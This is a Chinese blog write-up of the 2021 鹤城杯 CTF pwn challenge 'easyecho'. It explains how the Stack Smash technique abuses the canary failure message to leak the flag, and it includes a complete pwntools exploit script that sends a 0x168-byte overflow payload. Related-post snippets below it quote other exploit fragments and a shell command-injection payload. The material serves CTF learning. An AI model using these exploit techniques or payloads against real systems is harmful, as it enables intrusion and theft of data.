【PWN · Stack Smash】[2021 鹤城杯]easyecho

已于 2023-07-30 13:50:05 修改
阅读量635 收藏 4
点赞数
分类专栏: 【PWN · 高级栈相关】 文章标签: ctf pwn stackoverflow stacksmash 花式栈溢出
于 2023-07-30 13:49:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/132005890
版权

花式栈溢出——Canary保护是吧?接化发,拿来吧你

目录

前言

一、代码分析

0.保护

1.main函数

2.sub_CF0()函数 (v9指向的函数)

二、Stack Smash过程

0.原理简述 

1.条件与准备

2.地址泄露

①真实地址泄露

②flag地址泄露

③argv[0]地址泄露

3.exp

总结 

前言

Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。

然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。

一、代码分析

0.保护

全绿。。。这里方可从Canary下手。

存在这个函数,也是smash存在的标志之一。

值得注意的是,Stack Smash在libc2.23后就不可利用了。

1.main函数

大致流程是:读入name,开启server,如果backdoor,执行v9函数。

很明显第26行gets存在栈溢出漏洞。

2.sub_CF0()函数 (v9指向的函数)

将我们最关心的flag信息读取到了bss段上。 而调用这个函数,需要‘server’时,输入‘backdoor’。

二、Stack Smash过程

0.原理简述 

为了方便引出下述步骤,这里还是粗略地说明一下其中原理。

当Canary被修改后,函数返回时,检测到Canary错误,会调用 _stack_chk_fail() 函数,而这个函数会打印输入的文件名,即argv[0],存在栈上。

void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
                    msg, __libc_argv[0] ?: "<unknown>");
}

试想一下:如果我们构造垃圾数据造成栈溢出,且修改了原本argv[0]的内容为flag存放地址,那么canary报错时,就会将flag地址的内容即flag字符串输出。这就达成了我们的目的。

1.条件与准备

按照上述原理,我们构造payload,需要知道以下信息:

  • PIE保护开启,需要泄露一个有用的真实地址
  • flag存放的地址
  • argv[0]的地址

2.地址泄露

①真实地址泄露

可以知道,sub_E40() 函数读取了16个字节的数据到存储空间为16个字节的字符串数组中。注意字符串在打印时遇到\x00才会停止。于是这里可以泄露栈上信息

通过gdb调试如下:

发现栈上紧随输入部分的是sub_CF0函数的真实地址 

于是——输入16个字符后,在随后的输出中,接收该地址。同时通过该条函数的偏移量,我们可以得到程序基址。

②flag地址泄露

在server时输入backdoor后,sub_CF0函数被调用,读取目录下的flag文件(本地自己创建)

在gdb调试时,等待flag文件输入完成,用search指令即可查找读入的字符串位置。

结合①泄露的地址,事实上,基址知道了,flag在bss段偏移0x202040 :

也可以印证。

③argv[0]地址泄露

注意,该地址应是栈上地址,而我们要做的是输入来溢出覆盖复写栈上内容。因此我们更加关心的是,该地址与我们输入的偏移量是多少。 

而我们的栈溢出漏洞点在gets()处,也即先前输入backdoor并循环执行的同一位置。

注意,由箭头关系我们知道,文件名字符串指针,存在栈上的地址为0x7fffffffe0f8,而非0x7fffffffe018!

计算输入位置到存储位置偏移量:

然而0x178的偏移,带入后并不能成功得到答案。看了其他师傅的wp,同样的过程,他们的结果是0x168,可能是动态链接库版本的问题(?)这里存疑,求解答。

3.exp

from pwn import *
from pwn import p64,u64

context(arch="amd64",os="linux",log_level="debug")

io=process('./easyecho')
io=remote('node4.anna.nssctf.cn',28711)
io.recvuntil(b'name~')
io.send(b'a'*0x10)
io.recvuntil(b'a'*0x10)
addr=u64(io.recv(6).ljust(8,b'\x00'))
print(hex(addr))
base_addr=addr-0xcf0
io.sendlineafter(b'Input: ',b'backdoor')
payload=b'a'*0x168+p64(base_addr+0x202040)
io.sendlineafter(b'Input: ',payload)
io.sendlineafter(b'Input: ',b'exitexit') #ret才会触发canary检查
io.recv()
io.interactive()#交互才能得到stack报错信息

总结

花式栈溢出刚接触,还是啃下来了。其他更多的内容,也要花时间啃!

Mr_Fmnwon
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2021鹤城pwn部分wp
eeeeeight的博客
10-09 2058
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2381
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
鹤城PWN几道题的writeup
10-09 550
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
花式栈溢出技巧----Stack smash
qq_42192672的博客
10-17 1377
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇见过一次这种情况,但是是不求甚解的完成了,这次慢慢分析一下原理 栈保护和NX字段都开启了,这里科普一下栈保护,我喜欢叫它金丝雀,链接:https://blog.csdn.net/qq_42192672/article...
171119 Pwn-StackSmash
whklhhhh的博客
11-24 974
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
2021-鹤城部分Wp by Rewrite
Re_ly0n的博客
10-09 1224
Web狗的我今天上午满课,下午两节课,抽时间做了两个web,u1s1,两个web都是原题,pwn????刚开始pwn本地全部打通了,然后远程死活不通,最后跑路永劫无间了。哈哈哈哈 WEB MIDDLE_MAGIC %0a绕过第一关最后加%23是# 数组绕过第二关 json 弱类型比较 payload GET aaa=%0apass_the_level_1%23 POST admin[]=1&root_pwd[]=2&level_3={"result":0} SPRING
NSSCTF-鹤城2021-wp
F1rstb100d
09-22 703
NSSCTF-鹤城2021-wp
网鼎 pwn guess wp记录 stack smashing
weixin_44740530的博客
05-05 688
网鼎 pwn guess wp记录 stack smashing
好好说话之Stack smash
hollk’s blog
07-28 1901
Stack smash 我们之前一直没有做过关于canary保护的题,那么这个Stack smash就是绕过canary保护的技术。在程序加载了canary保护之后如果我们是在覆盖缓冲区的时候就会连带着覆盖了canary保护的cookie,这个时候程序就会报错。但是这个技术并不在乎是否报错,而是在乎报错的内容。stack smash技巧就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动canary保护之后,如果发现canary被修改的话就会执__stack_chk_fail函数来打印argv
赣网2021_pwn2.rar
12-11
赣网2021 pwn1 bin ctf
强网2022 pwn 赛题解析.docx
12-18
强网
安恒pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
PWN 强网2020siri 题目
09-21
PWN 强网2020siri 题目
[GXYCTF 2019]Ping Ping Ping(内联执行)、[鹤城 2021]EasyP ($_SERVER)
最新发布
2401_82985722的博客
05-10 592
于是就可以使用cat$IFS$9`ls` 这个命令来输出ls里面的flag.php以及index.php中的内容。$_SERVER['REQUEST_URI'] 得到:/php/flag.php/flag?1.$_SERVER['PHP_SELF']:获取当前执行脚本的文件名(相对于网站根目录的路径及 PHP 程序名称。$_SERVER['PHP_SELF'] 得到:/php/flag.php/flag。$_SERVER['SCRIPT_NAME'] 得到:/php/flag.php。
花式栈溢出技巧之stack smash
至臻求学,胸怀云月
03-01 1657
原理 在程序添加了canary保护后,如果我们读取的buffer覆盖了对应的值时,程序就会报错,而我们一般并不会关心报错信息。 但stack smash技巧则是利用打印这一信息的程序得到我们想要的内容。 这是因为程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。 ...
pwn2021 鹤壁 wp
woodwhale的博客
10-09 3695
pwn2021 鹤壁 wp 前言 这场比较简单,但是也看到了自己急于求成的下场,基础知识非常不牢固,很多调试手段都太拉了,逆向能力也是非常差,还是得跟着师傅们继续学啊! 1、ret2libc1 就是最简单的ret2libc1,好像还有后门,我给忘了 2、ret2libc3 也是基本的ret2libc3,puts.plt泄露puts.got从而泄露libc.address,system(“sh”) 要注意一下栈平衡,在rop之前加个ret 3、onecho 这题,虽然很简单,但是我太拉了,不会动调,导致
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 397
stack smash
网鼎2018 guess(stack smashing)
seaaseesa的博客
04-30 918
wdb2018_guess stack smashing 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Flag读取并存储在栈里 Fork三次子进程,然后有gets函数,导致栈溢出,但是有canary保护。 由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为...
2023 羊城 pwn
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值